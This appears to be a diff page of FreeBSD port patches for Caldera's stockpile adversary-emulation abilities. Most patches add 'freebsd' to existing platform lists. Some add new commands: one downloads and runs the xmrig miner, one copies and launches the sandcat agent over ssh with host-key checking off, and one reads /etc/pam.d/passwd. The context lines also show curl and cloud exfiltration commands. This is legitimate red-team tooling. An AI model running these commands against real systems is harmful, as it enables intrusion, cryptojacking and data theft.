--- plugins/stockpile/data/abilities/discovery/6c91884e-11ec-422f-a6ed-e76774b0daac.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/discovery/6c91884e-11ec-422f-a6ed-e76774b0daac.yml
@@ -14,7 +14,7 @@
- source: host.print.file
edge: has_size
target: host.print.size
- linux:
+ freebsd,linux:
sh:
command: lpq -a
parsers:

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_discovery_6e1a53c0-7352-4899-be35-fa7f364d5722.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/discovery/6e1a53c0-7352-4899-be35-fa7f364d5722.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/discovery/6e1a53c0-7352-4899-be35-fa7f364d5722.yml
@@ -12,7 +12,7 @@
sh:
command: |
pwd
- linux:
+ freebsd,linux:
sh:
command: |
pwd

10
security/caldera4/files/patch-plugins_stockpile_data_abilities_discovery_830bb6ed-9594-4817-b1a1-c298c0f9f425.yml Normal file
View file

@ -0,0 +1,10 @@
--- plugins/stockpile/data/abilities/discovery/830bb6ed-9594-4817-b1a1-c298c0f9f425.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/discovery/830bb6ed-9594-4817-b1a1-c298c0f9f425.yml
@@ -16,3 +16,7 @@
sh:
command: |
which google-chrome
+ freebsd:
+ sh:
+ command: |
+ which chrome

18
security/caldera4/files/patch-plugins_stockpile_data_abilities_discovery_85341c8c-4ecb-4579-8f53-43e3e91d7617.yml Normal file
View file

@ -0,0 +1,18 @@
--- plugins/stockpile/data/abilities/discovery/85341c8c-4ecb-4579-8f53-43e3e91d7617.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/discovery/85341c8c-4ecb-4579-8f53-43e3e91d7617.yml
@@ -14,7 +14,7 @@
parsers:
plugins.stockpile.app.parsers.ipaddr:
- source: remote.host.ip
- linux:
+ freebsd,linux:
sh:
command: arp -a
parsers:
@@ -25,4 +25,4 @@
command: arp -a
parsers:
plugins.stockpile.app.parsers.ipaddr:
- - source: remote.host.ip
\ No newline at end of file
+ - source: remote.host.ip

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_discovery_9849d956-37ea-49f2-a8b5-f2ca080b315d.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/discovery/9849d956-37ea-49f2-a8b5-f2ca080b315d.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/discovery/9849d956-37ea-49f2-a8b5-f2ca080b315d.yml
@@ -12,7 +12,7 @@
sh:
command: |
which go
- linux:
+ freebsd,linux:
sh:
command: |
which go

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_discovery_a41c2324-8c63-4b15-b3c5-84f920d1f226.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/discovery/a41c2324-8c63-4b15-b3c5-84f920d1f226.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/discovery/a41c2324-8c63-4b15-b3c5-84f920d1f226.yml
@@ -6,7 +6,7 @@
attack_id: T1083
name: File and Directory Discovery
platforms:
- linux:
+ freebsd,linux:
sh:
command: 'find ~ -type f -name #{host.print.file} 2>/dev/null'
parsers:

13
security/caldera4/files/patch-plugins_stockpile_data_abilities_discovery_b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml Normal file
View file

@ -0,0 +1,13 @@
--- plugins/stockpile/data/abilities/discovery/b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/discovery/b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml
@@ -16,6 +16,10 @@
sh:
command: |
python3 --version;python2 --version;python --version
+ freebsd:
+ sh:
+ command: |
+ pkg version -x python3 | cut -d '-' -f2 | awk '{print $1}' && pkg version -x python2 | cut -d '-' -f2 | awk '{print $1}'
windows:
cmd:
command: |

13
security/caldera4/files/patch-plugins_stockpile_data_abilities_discovery_b6f545ef-f802-4537-b59d-2cb19831c8ed.yml Normal file
View file

@ -0,0 +1,13 @@
--- plugins/stockpile/data/abilities/discovery/b6f545ef-f802-4537-b59d-2cb19831c8ed.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/discovery/b6f545ef-f802-4537-b59d-2cb19831c8ed.yml
@@ -8,7 +8,7 @@
attack_id: T1016
name: System Network Configuration Discovery
platforms:
- darwin:
+ darwin,freebsd:
sh:
command: |
- ifconfig | grep broadcast
\ No newline at end of file
+ ifconfig | grep broadcast

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_discovery_bd527b63-9f9e-46e0-9816-b8434d2b8989.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/discovery/bd527b63-9f9e-46e0-9816-b8434d2b8989.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/discovery/bd527b63-9f9e-46e0-9816-b8434d2b8989.yml
@@ -12,7 +12,7 @@
sh:
command: |
whoami
- linux:
+ freebsd,linux:
sh:
command: |
whoami

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_discovery_c0da588f-79f0-4263-8998-7496b1a40596.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/discovery/c0da588f-79f0-4263-8998-7496b1a40596.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/discovery/c0da588f-79f0-4263-8998-7496b1a40596.yml
@@ -15,7 +15,7 @@
plugins.stockpile.app.parsers.basic:
- source: host.user.name
- source: domain.user.name
- linux:
+ freebsd,linux:
sh:
command: whoami
parsers:

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_discovery_c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/discovery/c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/discovery/c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml
@@ -15,7 +15,7 @@
parsers:
plugins.stockpile.app.parsers.basic:
- source: host.user.name
- linux:
+ freebsd,linux:
sh:
command: |
cut -d: -f1 /etc/passwd | grep -v '_' | grep -v '#'

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_discovery_ce485320-41a4-42e8-a510-f5a8fe96a644.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/discovery/ce485320-41a4-42e8-a510-f5a8fe96a644.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/discovery/ce485320-41a4-42e8-a510-f5a8fe96a644.yml
@@ -8,7 +8,7 @@
attack_id: T1018
name: Remote System Discovery
platforms:
- linux:
+ freebsd,linux:
sh:
command: host "#{target.org.domain}" | grep mail | grep -oE '[^ ]+$' | rev | cut -c 2- | rev
parsers:

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_discovery_e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/discovery/e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/discovery/e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml
@@ -12,7 +12,7 @@
sh:
command: |
sudo ifconfig
- linux:
+ freebsd,linux:
sh:
command: |
sudo ifconfig

20
security/caldera4/files/patch-plugins_stockpile_data_abilities_discovery_e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml Normal file
View file

@ -0,0 +1,20 @@
--- plugins/stockpile/data/abilities/discovery/e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/discovery/e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml
@@ -12,6 +12,10 @@
sh:
command: |
pwpolicy getaccountpolicies
+ freebsd:
+ sh:
+ command: |
+ cat /etc/pam.d/passwd
linux:
sh:
command: |
@@ -19,4 +23,4 @@
windows:
psh:
command: |
- net accounts
\ No newline at end of file
+ net accounts

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_discovery_fa6e8607-e0b1-425d-8924-9b894da5a002.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/discovery/fa6e8607-e0b1-425d-8924-9b894da5a002.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/discovery/fa6e8607-e0b1-425d-8924-9b894da5a002.yml
@@ -15,7 +15,7 @@
parsers:
plugins.stockpile.app.parsers.basic:
- source: host.current.time
- linux:
+ freebsd,linux:
sh:
command: |
date -u +"%Y-%m-%dT%H:%M:%SZ"

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_execution_b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/execution/b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/execution/b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml
@@ -14,7 +14,7 @@
pkill -f sandcat
payloads:
- sandcat.go
- linux:
+ freebsd,linux:
sh:
command: |
nohup ./sandcat.go -server #{server} &

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_exfiltration_0582dc26-e0cf-4645-88cf-f37a02279976.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/exfiltration/0582dc26-e0cf-4645-88cf-f37a02279976.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/exfiltration/0582dc26-e0cf-4645-88cf-f37a02279976.yml
@@ -10,7 +10,7 @@
attack_id: T1567.001
name: Exfiltration to Code Repository
platforms:
- linux:
+ freebsd,linux:
sh:
command: | # Temporary file needed to avoid curl length restrictions
GHUser="#{github.user.name}";

18
security/caldera4/files/patch-plugins_stockpile_data_abilities_exfiltration_110cea7a-5b03-4443-92ee-7ccefaead451.yml Normal file
View file

@ -0,0 +1,18 @@
--- plugins/stockpile/data/abilities/exfiltration/110cea7a-5b03-4443-92ee-7ccefaead451.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/exfiltration/110cea7a-5b03-4443-92ee-7ccefaead451.yml
@@ -6,7 +6,7 @@
attack_id: T1029
name: Scheduled Transfer
platforms:
- linux:
+ freebsd,linux:
sh:
command: |
crontab -l > /tmp/origcron;
@@ -46,4 +46,4 @@
Register-ScheduledTask -TaskName "Scheduled exfiltration" -Trigger $trigger -Action $action;
cleanup: |
- Unregister-ScheduledTask -TaskName "Scheduled exfiltration" -Confirm:$false;
\ No newline at end of file
+ Unregister-ScheduledTask -TaskName "Scheduled exfiltration" -Confirm:$false;

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_exfiltration_2f90d4de-2612-4468-9251-b220e3727452.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/exfiltration/2f90d4de-2612-4468-9251-b220e3727452.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/exfiltration/2f90d4de-2612-4468-9251-b220e3727452.yml
@@ -6,7 +6,7 @@
attack_id: T1560.001
name: 'Archive Collected Data: Archive via Utility'
platforms:
- linux:
+ freebsd,linux:
sh:
command: |
tar -czf #{host.dir.git}.tar.gz -C "#{host.dir.git}" .; printf #{host.dir.git}.tar.gz;

18
security/caldera4/files/patch-plugins_stockpile_data_abilities_exfiltration_300157e5-f4ad-4569-b533-9d1fa0e74d74.yml Normal file
View file

@ -0,0 +1,18 @@
--- plugins/stockpile/data/abilities/exfiltration/300157e5-f4ad-4569-b533-9d1fa0e74d74.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/exfiltration/300157e5-f4ad-4569-b533-9d1fa0e74d74.yml
@@ -17,7 +17,7 @@
parsers:
plugins.stockpile.app.parsers.basic:
- source: host.dir.compress
- linux:
+ freebsd,linux:
sh:
command: |
tar -P -zcf #{host.dir.staged}.tar.gz #{host.dir.staged} && echo #{host.dir.staged}.tar.gz
@@ -38,4 +38,4 @@
- source: host.dir.compress
requirements:
- plugins.stockpile.app.requirements.paw_provenance:
- - source: host.dir.staged
\ No newline at end of file
+ - source: host.dir.staged

18
security/caldera4/files/patch-plugins_stockpile_data_abilities_exfiltration_3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml Normal file
View file

@ -0,0 +1,18 @@
--- plugins/stockpile/data/abilities/exfiltration/3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/exfiltration/3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml
@@ -43,7 +43,7 @@
$result = $sr.ReadToEnd();
$result;
$res.close();
- linux:
+ freebsd,linux:
sh:
command: |
LocalFile='#{host.dir.compress}';
@@ -55,4 +55,4 @@
--data-binary @#{host.dir.compress}
requirements:
- plugins.stockpile.app.requirements.paw_provenance:
- - source: host.dir.compress
\ No newline at end of file
+ - source: host.dir.compress

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_exfiltration_4a1120a5-971c-457f-bb07-60641b4723fd.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/exfiltration/4a1120a5-971c-457f-bb07-60641b4723fd.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/exfiltration/4a1120a5-971c-457f-bb07-60641b4723fd.yml
@@ -6,7 +6,7 @@
attack_id: T1567.001
name: Exfiltration to Code Repository
platforms:
- linux: # https://docs.github.com/en/rest/reference/repos#contents
+ freebsd,linux: # https://docs.github.com/en/rest/reference/repos#contents
sh:
command: |
GHUser="#{github.user.name}";

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_exfiltration_5c5b0392-1daa-45e1-967c-2f361ce78849.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/exfiltration/5c5b0392-1daa-45e1-967c-2f361ce78849.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/exfiltration/5c5b0392-1daa-45e1-967c-2f361ce78849.yml
@@ -11,7 +11,7 @@
attack_id: T1030
name: Data Transfer Size Limits
platforms:
- linux:
+ freebsd,linux:
sh:
command: |
tar -C #{host.dir.staged} -czf - . | gpg -c --pinentry-mode=loopback --passphrase '#{host.archive.password}' > #{host.dir.staged}.tar.gz.gpg;

18
security/caldera4/files/patch-plugins_stockpile_data_abilities_exfiltration_a201bec2-a193-4b58-bf0e-57fa621da474.yml Normal file
View file

@ -0,0 +1,18 @@
--- plugins/stockpile/data/abilities/exfiltration/a201bec2-a193-4b58-bf0e-57fa621da474.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/exfiltration/a201bec2-a193-4b58-bf0e-57fa621da474.yml
@@ -7,7 +7,7 @@
attack_id: T1567.001
name: Exfiltration to Code Repository
platforms:
- linux:
+ freebsd,linux:
sh:
command: |
GHUser="#{github.user.name}";
@@ -62,4 +62,4 @@
};
requirements:
- plugins.stockpile.app.requirements.paw_provenance:
- - source: host.dir.staged
\ No newline at end of file
+ - source: host.dir.staged

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_exfiltration_ba0deadb-97ac-4a4c-aa81-21912fc90980.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/exfiltration/ba0deadb-97ac-4a4c-aa81-21912fc90980.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/exfiltration/ba0deadb-97ac-4a4c-aa81-21912fc90980.yml
@@ -9,7 +9,7 @@
attack_id: T1537
name: 'Transfer Data to Cloud Account'
platforms:
- linux:
+ freebsd,linux:
sh:
command: |
LocalFile='#{host.dir.compress}';

18
security/caldera4/files/patch-plugins_stockpile_data_abilities_exfiltration_d754878c-17dd-46dc-891c-a993f8a10336.yml Normal file
View file

@ -0,0 +1,18 @@
--- plugins/stockpile/data/abilities/exfiltration/d754878c-17dd-46dc-891c-a993f8a10336.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/exfiltration/d754878c-17dd-46dc-891c-a993f8a10336.yml
@@ -8,7 +8,7 @@
attack_id: T1048.003
name: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
platforms:
- linux:
+ freebsd,linux:
sh:
command: |
LocalFile='#{host.dir.compress}';
@@ -35,4 +35,4 @@
$requestStream.Dispose();
requirements:
- plugins.stockpile.app.requirements.paw_provenance:
- - source: host.dir.compress
\ No newline at end of file
+ - source: host.dir.compress

18
security/caldera4/files/patch-plugins_stockpile_data_abilities_exfiltration_e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml Normal file
View file

@ -0,0 +1,18 @@
--- plugins/stockpile/data/abilities/exfiltration/e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/exfiltration/e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml
@@ -8,7 +8,7 @@
attack_id: T1567.002
name: 'Exfiltration to Cloud Storage'
platforms:
- linux:
+ freebsd,linux:
sh:
command: |
LocalFile='#{host.dir.compress}';
@@ -30,4 +30,4 @@
aws s3 rm s3://#{s3.source.name}/$RemoteName;
requirements:
- plugins.stockpile.app.requirements.paw_provenance:
- - source: host.dir.compress
\ No newline at end of file
+ - source: host.dir.compress

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_exfiltration_ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/exfiltration/ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/exfiltration/ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml
@@ -12,7 +12,7 @@
sh:
command: |
curl -F "data=@#{host.dir.compress}" --header "X-Request-ID: `hostname`-#{paw}" #{server}/file/upload
- linux:
+ freebsd,linux:
sh:
command: |
curl -F "data=@#{host.dir.compress}" --header "X-Request-ID: `hostname`-#{paw}" #{server}/file/upload

22
security/caldera4/files/patch-plugins_stockpile_data_abilities_impact_46da2385-cf37-49cb-ba4b-a739c7a19de4.yml Normal file
View file

@ -0,0 +1,22 @@
--- plugins/stockpile/data/abilities/impact/46da2385-cf37-49cb-ba4b-a739c7a19de4.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/impact/46da2385-cf37-49cb-ba4b-a739c7a19de4.yml
@@ -19,6 +19,19 @@
cleanup: |
rm -rf ./xmrig*;
timeout: 120
+ freebsd:
+ sh:
+ # FreeBSD should include `timeout` making this easy.
+ # We expect timeout to return a 124, which needs to then return a 0
+ # to make Caldera UI happy.
+ command: |
+ wget https://github.com/xmrig/xmrig/releases/download/v6.19.2/xmrig-6.19.2-freebsd-static-x64.tar.gz;
+ tar -xf xmrig-6.19.2-freebsd-static-x64.tar.gz;
+ timeout 60 ./xmrig-6.19.2/xmrig;
+ [ $? -eq 124 ]
+ cleanup: |
+ rm -rf ./xmrig*;
+ timeout: 120
darwin:
sh:
# MacOS does not include timeout, but can mimic the process with screen.

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_impact_47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/impact/47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/impact/47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml
@@ -12,7 +12,7 @@
sh:
command: |
echo "proof that this machine was hacked." > message.txt
- linux:
+ freebsd,linux:
sh:
command: |
echo "proof that this machine was hacked." > message.txt

11
security/caldera4/files/patch-plugins_stockpile_data_abilities_impact_55f9600a-756f-496b-b27f-682052dc429c.yml Normal file
View file

@ -0,0 +1,11 @@
--- plugins/stockpile/data/abilities/impact/55f9600a-756f-496b-b27f-682052dc429c.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/impact/55f9600a-756f-496b-b27f-682052dc429c.yml
@@ -7,7 +7,7 @@
command: ./mission.go -duration 60 -extension .caldera -dir '/'
payloads:
- mission.go
- linux:
+ freebsd,linux:
sh:
command: ./mission.go -duration 60 -extension .caldera -dir '/'
payloads:

16
security/caldera4/files/patch-plugins_stockpile_data_abilities_lateral-movement_10a9d979-e342-418a-a9b0-002c483e0fa6.yml Normal file
View file

@ -0,0 +1,16 @@
--- plugins/stockpile/data/abilities/lateral-movement/10a9d979-e342-418a-a9b0-002c483e0fa6.yml.orig 2022-09-14 02:24:22 UTC
+++ plugins/stockpile/data/abilities/lateral-movement/10a9d979-e342-418a-a9b0-002c483e0fa6.yml
@@ -24,4 +24,13 @@
ssh -o ConnectTimeout=3 -o StrictHostKeyChecking=no #{remote.ssh.cmd} 'pkill -f sandcat & rm -f ~/sandcat.go'
payloads:
- sandcat.go-linux
+ freebsd:
+ sh:
+ command: |
+ scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-freebsd #{remote.ssh.cmd}:~/sandcat.go &&
+ ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'
+ cleanup: |
+ ssh -o ConnectTimeout=3 -o StrictHostKeyChecking=no #{remote.ssh.cmd} 'pkill -f sandcat & rm -f ~/sandcat.go'
+ payloads:
+ - sandcat.go-freebsd
singleton: True

Some files were not shown because too many files have changed in this diff Show more